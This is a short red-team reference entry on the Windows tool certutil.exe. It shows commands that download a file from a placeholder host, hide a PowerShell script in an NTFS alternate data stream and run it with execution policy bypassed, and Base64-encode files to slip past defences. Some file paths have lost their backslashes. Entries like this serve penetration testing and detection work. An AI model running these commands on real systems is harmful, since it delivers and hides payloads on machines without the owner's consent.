Command Hacking Database (CHDB)

The goal of the CHDB project is to document every binary, script, and library that can be helpful for penetration testing (Red Team).

For Windows

certutil

Certutil.exe is a command-line program, installed as part of Certificate Services. You can use certutil.exe to dump and display certification authority (CA) configuration information, configure Certificate Services, backup and restore CA components, and verify certificates, key pairs, and certificate chains.

If certutil is run on a certification authority without additional parameters, it displays the current certification authority configuration. If certutil is run on a non-certification authority, the command defaults to running the certutil [-dump] command.

Important

Earlier versions of certutil may not provide all of the options that are described in this document. You can see all the options that a specific version of certutil provides by running certutil -? or certutil -?.

Download From Certuil

certutil.exe -urlcache -split -f http://example.com/file_name file_name

Download file and save it in an NTFS Alternate Data Stream (ADS)

certutil.exe -urlcache -split -f http://example.com/file_name.ps1 c:temp:file_name 

Test example:

powershell -ep bypass - < c:temp:file_name

Encode (Base64) files to evade defensive measures

certutil -encode InputFileName EncodedOutputFileName

Decode (Base64) file

certutil -decode File_Encoded File_Decoded

Defaut Path

C:WindowsSystem32certutil.exe, C:\WindowsSysWOW64certutil.exe

Protocol

HTTP, HTTPS

Windows Platform

Windows 7
windows 8
windows 10

Description

certutil – dump and display certification authority (CA) configuration information, configure Certificate Services, backup and restore CA components, and verify certificates, key pairs, and certificate chains.